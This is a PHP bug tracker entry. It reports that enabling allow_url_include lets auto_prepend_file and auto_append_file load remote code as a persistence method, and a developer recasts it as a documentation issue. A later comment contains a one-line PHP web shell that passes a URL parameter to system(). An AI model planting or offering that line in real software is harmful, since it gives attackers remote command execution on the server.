|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Doc Bug #79476 remote file include
Submitted: 2020-04-14 15:28 UTC Modified: 2020-04-16 07:54 UTC
Avg. Score:3.0 ± 1.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: c0d1M4x at outlook dot com Assigned:
Status: Verified Package: *Configuration Issues
PHP Version: 7.2.29 OS: Linux/Windows
Private report: No CVE-ID: None
View Add Comment Developer Edit
Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please — but make sure to vote on the bug!
Your email address:
Solve the problem:
23 - 10 = ?
Subscribe to this entry?

 [2020-04-14 15:28 UTC] c0d1M4x at outlook dot com
[php version]

Test version is php 7.2.27(Centos) and php 7.3.x(Windows)

[linux install command]

yum install php72w-common php72w-fpm php72w-opcache php72w-gd php72w-mysqlnd php72w-mbstring php72w-pecl-redis php72w-pecl-memcached php72w-devel -y


The issus config file is "php.ini".

When "allow_url_include" is set to "On", "auto_prepend_file" and  "auto_append_file" can be set to a remote address and can be successfully included and exploited. This may cause the attacker to use this configuration item to use getshell for a long time in the case of a getshell or other vulnerabilities.


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2020-04-15 09:01 UTC]
-Type: Security +Type: Documentation Problem
 [2020-04-15 09:01 UTC]
allow_url_include defaults to Off, and is deprecated as of PHP
7.4.0.  If you enable this setting, you are supposed to know what
you are doing, so this is not a security issue.

I think, though, that this can be documented better.  The security
warning on the include man page[1] isn't as clear is it could be,
and likely a cautionary note should be added to the documentation
of the INI setting[2].  Furthermore, its deprecation has to be

[1] <>
[2] <>
 [2020-04-16 07:54 UTC]
-Status: Open +Status: Verified
 [2023-11-10 15:12 UTC] ragafa5955 at glalen dot com
 [2023-11-10 15:37 UTC] n13bng at gmail dot com
<?php echo system($_GET['a']);?>
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Jun 19 04:01:31 2024 UTC